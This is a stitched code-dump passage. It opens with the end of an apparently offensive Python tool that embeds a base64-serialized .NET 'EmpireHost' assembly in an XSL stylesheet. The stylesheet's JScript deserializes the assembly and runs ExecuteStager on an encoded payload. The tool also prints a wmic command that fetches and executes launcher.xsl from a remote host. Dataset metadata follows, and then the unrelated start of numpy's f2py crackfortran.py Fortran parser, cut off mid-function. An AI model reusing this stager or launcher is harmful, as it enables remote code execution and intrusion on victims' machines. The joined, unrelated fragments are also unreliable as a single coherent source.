"Y2l0eQBzZXRfQ2FwYWNpdHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBTeXN0ZW0uU2VjdXJp"+
"dHkASXNOdWxsT3JFbXB0eQBQU05vdGVQcm9wZXJ0eQAAAAtEAHUAbQBtAHkAABVQAG8AdwBlAHIA"+
"UwBoAGUAbABsAAAXbwB1AHQALQBkAGUAZgBhAHUAbAB0AAEpSABvAHMAdAAuAFIAZQBwAG8AcgB0"+
"AEUAeABjAGUAcAB0AGkAbwBuAAANJABpAG4AcAB1AHQAABVvAHUAdAAtAHMAdAByAGkAbgBnAAEN"+
"RQBtAHAAaQByAGUAAIClQwBhAG4AbgBvAHQAIABzAHUAcwBwAGUAbgBkACAAdABoAGUAIABzAGgA"+
"ZQBsAGwALAAgAEUAbgB0AGUAcgBOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABtAGUAdABo"+
"AG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AEgA"+
"bwBzAHQALgAAd1QAaABlACAARQB4AGkAdABOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABt"+
"AGUAdABoAG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAA"+
"TQB5AEgAbwBzAHQALgAAAwoAAAMgAAAVfAB7ADAAfQA+ACAAewAxAH0AIAAAI1sARABlAGYAYQB1"+
"AGwAdAAgAGkAcwAgACgAewAwAH0AXQAAIUkAbgB2AGEAbABpAGQAIABjAGgAbwBpAGMAZQA6ACAA"+
"ACtbAEQAZQBmAGEAdQBsAHQAIABjAGgAbwBpAGMAZQBzACAAYQByAGUAIAAAJ1sARABlAGYAYQB1"+
"AGwAdAAgAGMAaABvAGkAYwBlACAAaQBzACAAAA0iAHsAMAB9ACIALAAAA10AABlDAGgAbwBpAGMA"+
"ZQBbAHsAMAB9AF0AOgAAFUQARQBCAFUARwA6ACAAewAwAH0AABlWAEUAUgBCAE8AUwBFADoAIAB7"+
"ADAAfQAAGVcAQQBSAE4ASQBOAEcAOgAgAHsAMAB9AAAhQQBsAGwAVQBzAGUAcgBzAEEAbABsAEgA"+
"bwBzAHQAcwAAJ0EAbABsAFUAcwBlAHIAcwBDAHUAcgByAGUAbgB0AEgAbwBzAHQAACdDAHUAcgBy"+
"AGUAbgB0AFUAcwBlAHIAQQBsAGwASABvAHMAdABzAAAtQwB1AHIAcgBlAG4AdABVAHMAZQByAEMA"+
"dQByAHIAZQBuAHQASABvAHMAdAAAGXMAZQB0AC0AdgBhAHIAaQBhAGIAbABlAAEJTgBhAG0AZQAA"+
"D3AAcgBvAGYAaQBsAGUAAAtWAGEAbAB1AGUAAA1PAHAAdABpAG8AbgAAI1cAaQBuAGQAbwB3AHMA"+
"UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs"+
"AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA"+
"bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu"+
"AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy"+
"AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA"+
"aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy"+
"AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg"+
"AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA"+
"IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk"+
"AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A"+
"dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA"+
"aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0"+
"AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA"+
"UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA"+
"ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp"+
"AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA"+
"ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ"+
"AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA"+
"ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA"+
"C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S"+
"sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c"+
"HRJRCBJRBAAAEk0GIAEBEoEBCAACEkkScRJNBAABARwEAAASRQUgAQESSQUgAQESUQggABUSXQES"+
"YQMHARwEAAECDgUgARJFDgQgABJRBSAAEoERBxUSXQESgRUFIAETAAgJIAIBEYEZEYEZCyABFRJd"+
"ARJhEoEdEgcGHBJZHBUSXQESYRUSZQEcDgUgABKBIQogBAESVQ4RgSUcBRUSZQEcBSABARMABhUS"+
"XQESYQMgAAgDIAAcBSAAEoCBBSACDggIBAcBEmkFBwIcElUFIAASgSkFIAARgS0DIAAOBQAAEoEx"+
"BCAAEn0HIAQBCAgICAQAABF5IAcGFRKAlQIOEmEVEoCdARKAmRKAmR0ODhUSgJUCDhJhBwAEDg4O"+
"Dg4KIAMBEYC5EYC5DggVEoCVAg4SYQcVEl0BEoCZCSAAFRKAnQETAAgVEoCdARKAmQQgABMAAwAA"+
"DgUAARJhHAcgAgETABMBAyAAAg8HBRQOAgACAAASgI0IDggEAAASfQcUDgIAAgAACQADDhKBRQ4d"+
"HAYgARKAjQ4HFRJdARKAoQUgAQ4SfQUAAgIODgUAAg4ODiMHDBQOAgACAAASgI0VEl0BCBUSXQEI"+
"CAgVEoCdAQgICA4OCAUVEl0BCAYVEoClAQgGFRKAnQEICyADEoCNEoFFDh0cByACEoCNCAgEBwES"+
"KAcgAgEOEoC1BAABAQ4FBwERgLkFAAARgLkGAAEBEYC5AwAAAQcHAx0OHQ4DAgYOBiABHQ4dAwQg"+
"AQMIDAcDFA4CAAIAAAgdDgUgAgEICAYgAwEICA4EIAEBHAogABUSgVEBEoFVBSACAQ4cCBUSgVEB"+
"EoFVFQcKFRKAxQESUQ4ODg4SYRJRHQ4IDgcVEoDFARJRBSABElEOBiACElEOHAYgAhJRDgIFIAAd"+
"EwAEBwIODgYAAQ4RgWkGAAMODg4OCgcEDhKAyRKAzQ4EBhKAzQYgARKAzQ4EIAEcDgUAABKAyQQA"+
"AQ4OCAABEoF1EYF5CAABEoDJEoF1AwAACAUAAgEICAQAAQEIAwAAAgIGGAUAABKBgQUgABKAhQ4H"+
"BxKAtRKAtQ4IAwMSKAQKARIoBCABAQMECgESLBMHDRJUETgYGAgYCBgIAhFQCB4ABgABGBKAtQUA"+
"AgIYGAQAARgIBQACGBgIAh4ABAABARgLBwYSVBgYAhFQHgAFIAIBDg4GAAMBGAgGBAABDhgEBwES"+
"TAQgAB0DERABARUSgMUBHgAVEoClAR4AAwoBAwYVEoGZAQMFIAIBHBgGFRKAxQEDCiABARUSgZkB"+
"EwAPBwcSgI0SgI0SgI0ICAgICwcICAgIGBgYCBIsBwcDEoC1CAMFAAIGGAgGBwISgLUIBgABCBKB"+
"dQi3elxWGTTgiQgxvzhWrTZONTpTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABc"+
"AFAAbwB3AGUAcgBTAGgAZQBsAGwAIFAAbwB3AGUAcgBTAGgAZQBsAGwARQBuAGcAaQBuAGUAHkEA"+
"cABwAGwAaQBjAGEAdABpAG8AbgBCAGEAcwBlAAIxAAQBAAAABAIAAAAEEAAAAAQgAAAABAABAAAE"+
"AAIAAAQAEAAABAAAABAEBAAAAAQIAAAABEAAAAAEgAAAAAQABAAABAAIAAAEAEAAAAQAAAIABAAA"+
"BAAEAAAIAAQAABAABP9/AAAEAQIAAAQAAAAABMcEAAAEVwAAAATsAwAAARUDBhIMAgYCAgYIAwYS"+
"EAMGEkkDBhJFAgYcAwYReQMGEn0DBhIUAwYSHAQGEoC1AwYROAMGETwDBhFQBCABAg4FIAEBElUG"+
"IAIBHBJtBSABARIMBCAAEXkEIAASSRIACQgQETQIEAkYCRAYEAkQAggVAAkCCBgJEoCNEAgSgI0Q"+
"CBKAjRAIBSAAEoCREyADFRKAlQIOEmEODhUSXQESgJkNIAQIDg4VEl0BEoChCBYgBBUSXQEIDg4V"+
"El0BEoChFRKApQEICSAEEoCpDg4ODg8gBhKAqQ4ODg4RgK0RgLEFIAASgLUHIAIBChKAvQUAAR0O"+
"DhAAARQOAgACAAAVEl0BEoChCAAEEmEODg4OBgABHRJRDgcAAh0SUQ4CBQACDg4CBgADDg4CAgUg"+
"ABGAuQYgAQERgLkFIAARgNUGIAEBEYDVBSAAEYDZBiABARGA2Q4gARQRgN0CAAIAABGA4QggARGA"+
"5RGA6Q8gBAERgOERgNkRgOERgN0PIAIBEYDZFBGA3QIAAgAACSACARGA4RGA3QYAAhIoDg4HAAMS"+
"KA4OGAgABBIoDg4ODgkABRIoDg4YDg4GAAISLA4OBwADEiwODhgMAAQSLA4OEoC1EoC1DQAFEiwO"+
"DhgSgLUSgLUIAAMSKBJADg4MAAMSLBJAEoC1EoC1DRABAx4AEkASgLUSgLUHAAMSKA4ODggABBIo"+
"Dg4OGAkABRIoDg4ODg4KAAYSKA4ODhgODgYAARIoEkQIAAMSKBJEDg4HAAMSLA4ODggABBIsDg4O"+
"GA0ABRIsDg4OEoC1EoC1DgAGEiwODg4YEoC1EoC1BgABEiwSRAwAAxIsEkQSgLUSgLUNEAEDHgAS"+
"RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO"+
"Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY"+
"GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI"+
"BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA"+
"EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC"+
"FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB"+
"ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky"+
"OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA"+
"UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI"+
"b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc"+
"kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y"+
"RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA"+
"AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs"+
"AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA"+
"AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu"+
"AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA"+
"aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv"+
"AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A"+
"CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0"+
"AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A"+
"AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA"+
"AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA"+
"IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA"+
"AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA"+
"SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw"+
"AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA"+
"LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu"+
"ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl"+
"bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'EmpireHost';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
o.ExecuteStager(EncodedPayload);
} catch (e) {
debug(e.message);
}
]]></ms:script>
</stylesheet>
"""
command = """\n[+] wmic process get brief /format:"http://10.10.10.10/launcher.xsl" """
print colored(command, 'green', attrs=['bold'])
return code
| bsd-3-clause | -4,492,481,551,449,662,500 | 82.566216 | 209 | 0.755138 | false |
grlee77/numpy | numpy/f2py/crackfortran.py | 1 | 130739 | #!/usr/bin/env python3
"""
crackfortran --- read fortran (77,90) code and extract declaration information.
Copyright 1999-2004 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/09/27 07:13:49 $
Pearu Peterson
Usage of crackfortran:
======================
Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename>
-m <module name for f77 routines>,--ignore-contains
Functions: crackfortran, crack2fortran
The following Fortran statements/constructions are supported
(or will be if needed):
block data,byte,call,character,common,complex,contains,data,
dimension,double complex,double precision,end,external,function,
implicit,integer,intent,interface,intrinsic,
logical,module,optional,parameter,private,public,
program,real,(sequence?),subroutine,type,use,virtual,
include,pythonmodule
Note: 'virtual' is mapped to 'dimension'.
Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug).
Note: code after 'contains' will be ignored until its scope ends.
Note: 'common' statement is extended: dimensions are moved to variable definitions
Note: f2py directive: <commentchar>f2py<line> is read as <line>
Note: pythonmodule is introduced to represent Python module
Usage:
`postlist=crackfortran(files)`
`postlist` contains declaration information read from the list of files `files`.
`crack2fortran(postlist)` returns a fortran code to be saved to pyf-file
`postlist` has the following structure:
*** it is a list of dictionaries containing `blocks':
B = {'block','body','vars','parent_block'[,'name','prefix','args','result',
'implicit','externals','interfaced','common','sortvars',
'commonvars','note']}
B['block'] = 'interface' | 'function' | 'subroutine' | 'module' |
'program' | 'block data' | 'type' | 'pythonmodule'
B['body'] --- list containing `subblocks' with the same structure as `blocks'
B['parent_block'] --- dictionary of a parent block:
C['body'][<index>]['parent_block'] is C
B['vars'] --- dictionary of variable definitions
B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first)
B['name'] --- name of the block (not if B['block']=='interface')
B['prefix'] --- prefix string (only if B['block']=='function')
B['args'] --- list of argument names if B['block']== 'function' | 'subroutine'
B['result'] --- name of the return value (only if B['block']=='function')
B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None
B['externals'] --- list of variables being external
B['interfaced'] --- list of variables being external and defined
B['common'] --- dictionary of common blocks (list of objects)
B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions)
B['from'] --- string showing the 'parents' of the current block
B['use'] --- dictionary of modules used in current block:
{<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}}
B['note'] --- list of LaTeX comments on the block
B['f2pyenhancements'] --- optional dictionary
{'threadsafe':'','fortranname':<name>,
'callstatement':<C-expr>|<multi-line block>,
'callprotoargument':<C-expr-list>,
'usercode':<multi-line block>|<list of multi-line blocks>,
'pymethoddef:<multi-line block>'
}
B['entry'] --- dictionary {entryname:argslist,..}
B['varnames'] --- list of variable names given in the order of reading the
Fortran code, useful for derived types.
B['saved_interface'] --- a string of scanned routine signature, defines explicit interface
*** Variable definition is a dictionary
D = B['vars'][<variable name>] =
{'typespec'[,'attrspec','kindselector','charselector','=','typename']}
D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' |
'double precision' | 'integer' | 'logical' | 'real' | 'type'
D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)',
'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)',
'optional','required', etc)
K = D['kindselector'] = {['*','kind']} (only if D['typespec'] =
'complex' | 'integer' | 'logical' | 'real' )
C = D['charselector'] = {['*','len','kind']}
(only if D['typespec']=='character')
D['='] --- initialization expression string
D['typename'] --- name of the type if D['typespec']=='type'
D['dimension'] --- list of dimension bounds
D['intent'] --- list of intent specifications
D['depend'] --- list of variable names on which current variable depends on
D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised
D['note'] --- list of LaTeX comments on the variable
*** Meaning of kind/char selectors (few examples):
D['typespec>']*K['*']
D['typespec'](kind=K['kind'])
character*C['*']
character(len=C['len'],kind=C['kind'])
(see also fortran type declaration statement formats below)
Fortran 90 type declaration statement format (F77 is subset of F90)
====================================================================
(Main source: IBM XL Fortran 5.1 Language Reference Manual)
type declaration = <typespec> [[<attrspec>]::] <entitydecl>
<typespec> = byte |
character[<charselector>] |
complex[<kindselector>] |
double complex |
double precision |
integer[<kindselector>] |
logical[<kindselector>] |
real[<kindselector>] |
type(<typename>)
<charselector> = * <charlen> |
([len=]<len>[,[kind=]<kind>]) |
(kind=<kind>[,len=<len>])
<kindselector> = * <intlen> |
([kind=]<kind>)
<attrspec> = comma separated list of attributes.
Only the following attributes are used in
building up the interface:
external
(parameter --- affects '=' key)
optional
intent
Other attributes are ignored.
<intentspec> = in | out | inout
<arrayspec> = comma separated list of dimension bounds.
<entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>]
[/<init_expr>/ | =<init_expr>] [,<entitydecl>]
In addition, the following attributes are used: check,depend,note
TODO:
* Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)'
-> 'real x(2)')
The above may be solved by creating appropriate preprocessor program, for example.
"""
import sys
import string
import fileinput
import re
import os
import copy
import platform
from . import __version__
# The environment provided by auxfuncs.py is needed for some calls to eval.
# As the needed functions cannot be determined by static inspection of the
# code, it is safest to use import * pending a major refactoring of f2py.
from .auxfuncs import *
f2py_version = __version__.version
# Global flags:
strictf77 = 1 # Ignore `!' comments unless line[0]=='!'
sourcecodeform = 'fix' # 'fix','free'
quiet = 0 # Be verbose if 0 (Obsolete: not used any more)
verbose = 1 # Be quiet if 0, extra verbose if > 1.
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0 # for old F77 programs without 'program' statement
ignorecontains = 1
dolowercase = 1
debug = []
# Global variables
beginpattern = ''
currentfilename = ''
expectbegin = 1
f90modulevars = {}
filepositiontext = ''
gotnextfile = 1
groupcache = None
groupcounter = 0
grouplist = {groupcounter: []}
groupname = ''
include_paths = []
neededmodule = -1
onlyfuncs = []
previous_context = None
skipblocksuntil = -1
skipfuncs = []
skipfunctions = []
usermodules = []
def reset_global_f2py_vars():
global groupcounter, grouplist, neededmodule, expectbegin
global skipblocksuntil, usermodules, f90modulevars, gotnextfile
global filepositiontext, currentfilename, skipfunctions, skipfuncs
global onlyfuncs, include_paths, previous_context
global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename
global f77modulename, skipemptyends, ignorecontains, dolowercase, debug
# flags
strictf77 = 1
sourcecodeform = 'fix'
quiet = 0
verbose = 1
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0
ignorecontains = 1
dolowercase = 1
debug = []
# variables
groupcounter = 0
grouplist = {groupcounter: []}
neededmodule = -1
expectbegin = 1
skipblocksuntil = -1
usermodules = []
f90modulevars = {}
gotnextfile = 1
filepositiontext = ''
currentfilename = ''
skipfunctions = []
skipfuncs = []
onlyfuncs = []
include_paths = []
previous_context = None
def outmess(line, flag=1):
global filepositiontext
if not verbose:
return
if not quiet:
if flag:
sys.stdout.write(filepositiontext)
sys.stdout.write(line)
re._MAXCACHE = 50
defaultimplicitrules = {}
for c in "abcdefghopqrstuvwxyz$_":
defaultimplicitrules[c] = {'typespec': 'real'}
for c in "ijklmn":
defaultimplicitrules[c] = {'typespec': 'integer'}
del c
badnames = {}
invbadnames = {}
for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case', 'while',
'return', 'signed', 'unsigned', 'if', 'for', 'typedef', 'sizeof', 'union',
'struct', 'static', 'register', 'new', 'break', 'do', 'goto', 'switch',
'continue', 'else', 'inline', 'extern', 'delete', 'const', 'auto',
'len', 'rank', 'shape', 'index', 'slen', 'size', '_i',
'max', 'min',
'flen', 'fshape',
'string', 'complex_double', 'float_double', 'stdin', 'stderr', 'stdout',
'type', 'default']:
badnames[n] = n + '_bn'
invbadnames[n + '_bn'] = n
def rmbadname1(name):
if name in badnames:
errmess('rmbadname1: Replacing "%s" with "%s".\n' %
(name, badnames[name]))
return badnames[name]
return name
def rmbadname(names):
return [rmbadname1(_m) for _m in names]
def undo_rmbadname1(name):
if name in invbadnames:
errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'
% (name, invbadnames[name]))
return invbadnames[name]
return name
def undo_rmbadname(names):
return [undo_rmbadname1(_m) for _m in names]
def getextension(name):
i = name.rfind('.')
if i == -1:
return ''
if '\\' in name[i:]:
return ''
if '/' in name[i:]:
return ''
return name[i + 1:]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
with open(file, 'r') as f:
line = f.readline()
n = 15 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n > 0 and line:
if line[0] != '!' and line.strip():
n -= 1
if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&':
result = 1
break
line = f.readline()
return result
# Read fortran (77,90) code
def readfortrancode(ffile, dowithline=show, istop=1):
"""
Read fortran codes from files and
1) Get rid of comments, line continuations, and empty lines; lower cases.
2) Call dowithline(line) on every line.
3) Recursively call itself when statement \"include '<filename>'\" is met.
"""
global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77
global beginpattern, quiet, verbose, dolowercase, include_paths
if not istop:
saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase
if ffile == []:
return
localdolowercase = dolowercase
cont = 0
finalline = ''
ll = ''
includeline = re.compile(
r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I)
cont1 = re.compile(r'(?P<line>.*)&\s*\Z')
cont2 = re.compile(r'(\s*&|)(?P<line>.*)')
mline_mark = re.compile(r".*?'''")
if istop:
dowithline('', -1)
ll, l1 = '', ''
spacedigits = [' '] + [str(_m) for _m in range(10)]
filepositiontext = ''
fin = fileinput.FileInput(ffile)
while True:
l = fin.readline()
if not l:
break
if fin.isfirstline():
filepositiontext = ''
currentfilename = fin.filename()
gotnextfile = 1
l1 = l
strictf77 = 0
sourcecodeform = 'fix'
ext = os.path.splitext(currentfilename)[1]
if is_f_file(currentfilename) and \
not (_has_f90_header(l) or _has_fix_header(l)):
strictf77 = 1
elif is_free_format(currentfilename) and not _has_fix_header(l):
sourcecodeform = 'free'
if strictf77:
beginpattern = beginpattern77
else:
beginpattern = beginpattern90
outmess('\tReading file %s (format:%s%s)\n'
% (repr(currentfilename), sourcecodeform,
strictf77 and ',strict' or ''))
l = l.expandtabs().replace('\xa0', ' ')
# Get rid of newline characters
while not l == '':
if l[-1] not in "\n\r\f":
break
l = l[:-1]
if not strictf77:
(l, rl) = split_by_unquoted(l, '!')
l += ' '
if rl[:5].lower() == '!f2py': # f2py directive
